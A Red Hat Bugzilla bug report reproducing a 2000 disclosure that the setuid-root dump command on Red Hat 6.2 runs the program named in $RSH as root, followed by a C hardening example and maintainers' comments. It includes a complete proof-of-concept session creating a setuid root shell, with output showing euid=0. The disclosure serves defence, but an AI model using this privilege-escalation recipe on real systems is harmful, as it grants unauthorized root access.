Red Hat Bugzilla – Bug 20112
dump executes $RSH with root privs
Last modified: 2007-03-26 23:37:10 EDT
From: JW Oh <mat@IVNTECH.COM>
Subject: Redhat 6.2 dump command executes external program with suid
Date: Tue, 31 Oct 2000 14:37:35 +0900
Linux dump command executes external program with suid privilege.
2. Tested Version
[mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
DUMP: Connection to garbage established.
DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
DUMP: Date of last level 0 dump: the epoch
DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
[mat@localhost mat]$ ls -la /home/mat/sh
-rwsr-xr-x 1 root tty 316848 Oct 31 14:38 /home/mat/sh
[mat@localhost mat]$ /home/mat/sh
uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
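An added example (not code from the report or from the dump sources) of the pattern that closes this class of bug in a setuid helper: an environment-supplied program path such as $RSH is ignored while the process runs with borrowed privileges, and root is dropped permanently before anything is exec'ed. DEFAULT_RSH and the function names are assumptions for illustration.

```c
/* Hardened handling of an environment-chosen helper in a setuid program.
   Illustrative code, not the dump project's own; DEFAULT_RSH is assumed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_RSH "/usr/bin/rsh"   /* assumed compiled-in default */

/* Pick the remote-shell binary.  When the effective uid differs from the
   real uid the caller's environment is untrusted, so $RSH is ignored and
   the compiled-in default is used.  Relative or empty values are also
   rejected so PATH lookup cannot be influenced. */
const char *choose_rsh(const char *env_rsh, uid_t ruid, uid_t euid)
{
    if (euid != ruid)
        return DEFAULT_RSH;                 /* running with setuid privileges */
    if (env_rsh == NULL || env_rsh[0] != '/')
        return DEFAULT_RSH;                 /* must be an absolute path */
    return env_rsh;
}

/* Give up setuid privileges for good.  Returns 0 on success, -1 if a step
   failed or if root could still be regained afterwards. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0) return -1;      /* group first, while still root */
    if (setuid(ruid) != 0) return -1;
    if (ruid != 0 && setuid(0) == 0) return -1;  /* must not be reversible */
    return 0;
}

/* Exec the helper as the invoking user; never reached with euid 0. */
int run_rsh(const char *host, const char *cmd)
{
    const char *rsh = choose_rsh(getenv("RSH"), getuid(), geteuid());
    if (drop_privileges() != 0) {
        perror("drop_privileges");
        return -1;
    }
    execl(rsh, rsh, host, cmd, (char *)NULL);
    perror(rsh);                            /* only reached if exec failed */
    return -1;
}

int main(void)
{
    printf("helper that would run: %s\n",
           choose_rsh(getenv("RSH"), getuid(), geteuid()));
    return 0;
}
```

With the report's environment (RSH=/home/mat/execute_this, real uid 500, effective uid 0) choose_rsh returns the default instead of the user-supplied file.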
WTF is dump on RH <7 setuid root anyway? RH7 dump is chmod 755 as it should be.
And another question: as Red Hat decided to remove the suid bit on RH7
(obviously because of security concerns), why didn't we see a security errata
update for RH 6.x at the time this decision was made? Do all vulnerabilities
have to get exploited and/or posted to BugTraq before actions get taken?
Admitted, I'm "a little bit" pissed right now.
Closing this report as duplicate... email@example.com was a minute faster than
*** This bug has been marked as a duplicate of 20111 ***